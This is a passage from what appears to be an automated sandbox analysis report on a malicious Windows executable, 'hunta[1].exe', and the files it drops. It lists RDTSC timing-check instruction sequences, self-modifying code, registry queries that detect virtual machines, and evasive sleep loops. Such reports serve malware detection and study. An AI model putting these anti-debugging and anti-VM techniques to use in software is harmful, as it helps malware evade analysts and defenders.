Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5940044 second address: 5940093 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF2E5514DF5h 0x00000009 sbb ax, 4636h 0x0000000e jmp 00007FF2E5514DF1h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 jmp 00007FF2E5514DECh 0x0000001d xchg eax, ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FF2E5514DEAh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5940093 second address: 5940097 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5940097 second address: 594009D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 594009D second address: 59400AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF2E55A2C2Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59400AE second address: 59400D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF2E5514DF8h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59400D2 second address: 5940112 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF2E55A2C31h 0x00000008 mov ebx, ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d and esp, FFFFFFF8h 0x00000010 jmp 00007FF2E55A2C2Ah 0x00000015 xchg eax, ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FF2E55A2C37h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5940112 second address: 5940118 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5940118 second address: 594011C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 594011C second address: 59401BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FF2E5514DEEh 0x0000000e xchg eax, ebx 0x0000000f pushad 0x00000010 mov di, cx 0x00000013 pushad 0x00000014 movzx ecx, bx 0x00000017 popad 0x00000018 popad 0x00000019 push edx 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007FF2E5514DEAh 0x00000021 and ecx, 471E2068h 0x00000027 jmp 00007FF2E5514DEBh 0x0000002c popfd 0x0000002d mov edx, esi 0x0000002f popad 0x00000030 mov dword ptr [esp], esi 0x00000033 pushad 0x00000034 push ecx 0x00000035 jmp 00007FF2E5514DF7h 0x0000003a pop esi 0x0000003b mov bh, BDh 0x0000003d popad 0x0000003e mov esi, dword ptr [ebp+08h] 0x00000041 pushad 0x00000042 movzx esi, di 0x00000045 call 00007FF2E5514DF3h 0x0000004a push eax 0x0000004b pop edx 0x0000004c pop eax 0x0000004d popad 0x0000004e mov ebx, 00000000h 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007FF2E5514DF7h 0x0000005a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59401BC second address: 59401C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59401C2 second address: 594025E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a pushad 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FF2E5514DF3h 0x00000012 add eax, 5990747Eh 0x00000018 jmp 00007FF2E5514DF9h 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007FF2E5514DF0h 0x00000024 jmp 00007FF2E5514DF5h 0x00000029 popfd 0x0000002a popad 0x0000002b jmp 00007FF2E5514DF0h 0x00000030 popad 0x00000031 je 00007FF35726AF39h 0x00000037 jmp 00007FF2E5514DF0h 0x0000003c cmp dword ptr [esi+08h], DDEEDDEEh 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 594025E second address: 5940262 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5940262 second address: 5940266 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5940266 second address: 594026C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 594026C second address: 59402E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FF2E5514DF0h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ecx, esi 0x0000000f jmp 00007FF2E5514DF0h 0x00000014 je 00007FF35726AEF3h 0x0000001a jmp 00007FF2E5514DF0h 0x0000001f test byte ptr [77726968h], 00000002h 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 mov si, di 0x0000002c pushfd 0x0000002d jmp 00007FF2E5514DF9h 0x00000032 jmp 00007FF2E5514DEBh 0x00000037 popfd 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59402E0 second address: 59402F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF2E55A2C34h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59402F8 second address: 59402FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59402FC second address: 5940340 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007FF3572F8CD8h 0x0000000e pushad 0x0000000f jmp 00007FF2E55A2C38h 0x00000014 popad 0x00000015 mov edx, dword ptr [ebp+0Ch] 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FF2E55A2C37h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5940340 second address: 59403FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FF2E5514DECh 0x00000011 or ax, 31A8h 0x00000016 jmp 00007FF2E5514DEBh 0x0000001b popfd 0x0000001c mov ah, 60h 0x0000001e popad 0x0000001f push eax 0x00000020 pushad 0x00000021 call 00007FF2E5514DF0h 0x00000026 pushad 0x00000027 popad 0x00000028 pop ecx 0x00000029 mov dx, F8B4h 0x0000002d popad 0x0000002e xchg eax, ebx 0x0000002f pushad 0x00000030 push edi 0x00000031 pop edx 0x00000032 mov dx, ax 0x00000035 popad 0x00000036 xchg eax, ebx 0x00000037 pushad 0x00000038 pushfd 0x00000039 jmp 00007FF2E5514DF8h 0x0000003e or al, FFFFFF98h 0x00000041 jmp 00007FF2E5514DEBh 0x00000046 popfd 0x00000047 pushfd 0x00000048 jmp 00007FF2E5514DF8h 0x0000004d adc al, FFFFFFF8h 0x00000050 jmp 00007FF2E5514DEBh 0x00000055 popfd 0x00000056 popad 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59403FC second address: 5940400 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5940400 second address: 5940412 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5940412 second address: 5940429 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 77954804h 0x00000008 push edi 0x00000009 pop esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov di, ax 0x00000014 mov bl, ch 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5940429 second address: 5940463 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DF6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+14h] 0x0000000c pushad 0x0000000d movzx ecx, dx 0x00000010 mov bh, 4Ah 0x00000012 popad 0x00000013 push dword ptr [ebp+10h] 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FF2E5514DF1h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5940463 second address: 5940473 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF2E55A2C2Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59A1952 second address: 59A1984 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF2E5514DF8h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59A1984 second address: 59A1993 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59A1993 second address: 59A199B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59A199B second address: 59A19AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FF2E55A2C2Ah 0x0000000f rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59A19AF second address: 59A19E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 10303324h 0x00000008 mov ecx, edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FF2E5514DF0h 0x00000017 or cl, FFFFFFD8h 0x0000001a jmp 00007FF2E5514DEBh 0x0000001f popfd 0x00000020 mov bx, cx 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59A19E4 second address: 59A1A40 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c call 00007FF2E55A2C2Ch 0x00000011 push esi 0x00000012 pop edx 0x00000013 pop eax 0x00000014 jmp 00007FF2E55A2C37h 0x00000019 popad 0x0000001a push 0000007Fh 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FF2E55A2C35h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59A1AC4 second address: 59A1ACA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59A1ACA second address: 59A1952 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a jmp 00007FF2E55A2C30h 0x0000000f retn 0004h 0x00000012 lea eax, dword ptr [ebp-10h] 0x00000015 push eax 0x00000016 call ebx 0x00000018 mov edi, edi 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FF2E55A2C35h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5940687 second address: 5940696 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5940696 second address: 594069C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 594069C second address: 59406BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF2E5514DF3h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59406BA second address: 5940735 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF2E55A2C2Fh 0x00000009 xor ah, 0000002Eh 0x0000000c jmp 00007FF2E55A2C39h 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007FF2E55A2C30h 0x00000018 and cl, FFFFFFA8h 0x0000001b jmp 00007FF2E55A2C2Bh 0x00000020 popfd 0x00000021 popad 0x00000022 pop edx 0x00000023 pop eax 0x00000024 mov dword ptr [esp], ebp 0x00000027 jmp 00007FF2E55A2C36h 0x0000002c mov ebp, esp 0x0000002e pushad 0x0000002f mov di, 0520h 0x00000033 popad 0x00000034 pop ebp 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5940735 second address: 5940739 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5940739 second address: 594073F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59C002F second address: 59C0035 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59C0035 second address: 59C003B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59C003B second address: 59C003F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59C003F second address: 59C004E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59C004E second address: 59C0052 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59C0052 second address: 59C0056 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59C0056 second address: 59C005C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59C005C second address: 59C0075 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF2E55A2C35h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59C0075 second address: 59C009D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FF2E5514DEDh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59C009D second address: 59C00EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+0Ch] 0x0000000c jmp 00007FF2E55A2C2Eh 0x00000011 push dword ptr [ebp+08h] 0x00000014 jmp 00007FF2E55A2C30h 0x00000019 call 00007FF2E55A2C29h 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 mov edi, 1F141A80h 0x00000026 mov esi, edi 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59C00EA second address: 59C00EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59C00EF second address: 59C0112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FF2E55A2C39h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59C0112 second address: 59C01A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop esi 0x00000005 movsx edi, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f pushad 0x00000010 push edi 0x00000011 movzx ecx, dx 0x00000014 pop ebx 0x00000015 popad 0x00000016 mov eax, dword ptr [eax] 0x00000018 pushad 0x00000019 mov ebx, 3A921896h 0x0000001e popad 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 pushad 0x00000024 mov al, 31h 0x00000026 pushfd 0x00000027 jmp 00007FF2E5514DEBh 0x0000002c or cx, 051Eh 0x00000031 jmp 00007FF2E5514DF9h 0x00000036 popfd 0x00000037 popad 0x00000038 pop eax 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c pushfd 0x0000003d jmp 00007FF2E5514DF3h 0x00000042 jmp 00007FF2E5514DF3h 0x00000047 popfd 0x00000048 jmp 00007FF2E5514DF8h 0x0000004d popad 0x0000004e rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 597081A second address: 5970820 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5970820 second address: 5970824 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5970824 second address: 5970853 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FF2E55A2C2Dh 0x0000000e xchg eax, ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov bx, A69Eh 0x00000016 call 00007FF2E55A2C2Fh 0x0000001b pop ecx 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5970853 second address: 597087B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 1046808Bh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c jmp 00007FF2E5514DEAh 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FF2E5514DEDh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 597087B second address: 5970881 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5970881 second address: 5970898 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5970898 second address: 59708B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59708B5 second address: 59708BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59708BB second address: 59708BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59708BF second address: 59708C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\hunta[1].exe Special instruction interceptor: First address: FCDA5D instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\hunta[1].exe Special instruction interceptor: First address: 116EA53 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\hunta[1].exe Special instruction interceptor: First address: 11F6B5C instructions caused by: Self-modifying code
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Special instruction interceptor: First address: 44DA5D instructions caused by: Self-modifying code
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Special instruction interceptor: First address: 5EEA53 instructions caused by: Self-modifying code
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Special instruction interceptor: First address: 676B5C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Special instruction interceptor: First address: 3BDA5D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Special instruction interceptor: First address: 55EA53 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Special instruction interceptor: First address: 5E6B5C instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\hunta[1].exe Code function: 2_2_059B056A rdtsc 2_2_059B056A
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\hunta[1].exe Window / User API: threadDelayed 1037 Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window / User API: threadDelayed 1232 Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window / User API: threadDelayed 1134 Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window / User API: threadDelayed 777 Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window / User API: threadDelayed 1223 Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window / User API: threadDelayed 1103 Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window / User API: threadDelayed 710 Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window / User API: threadDelayed 1226 Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window / User API: threadDelayed 1247 Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window / User API: threadDelayed 558 Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window / User API: threadDelayed 1432 Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window / User API: threadDelayed 570 Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window / User API: threadDelayed 1021
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window / User API: threadDelayed 1047
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window / User API: threadDelayed 1008
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window / User API: threadDelayed 1013
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window / User API: threadDelayed 927
Found decision node followed by non-executed suspicious APIs
Source: C:\Users\user\Desktop\hunta[1].exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe Jump to dropped file
Found evaded block containing many API calls
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Evaded block: after key decision
Found evasive API chain (date check)
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\hunta[1].exe TID: 7636 Thread sleep time: -48024s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\hunta[1].exe TID: 7612 Thread sleep count: 1037 > 30 Jump to behavior
Source: C:\Users\user\Desktop\hunta[1].exe TID: 7612 Thread sleep time: -2075037s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\hunta[1].exe TID: 7420 Thread sleep count: 122 > 30 Jump to behavior
Source: C:\Users\user\Desktop\hunta[1].exe TID: 7420 Thread sleep count: 216 > 30 Jump to behavior
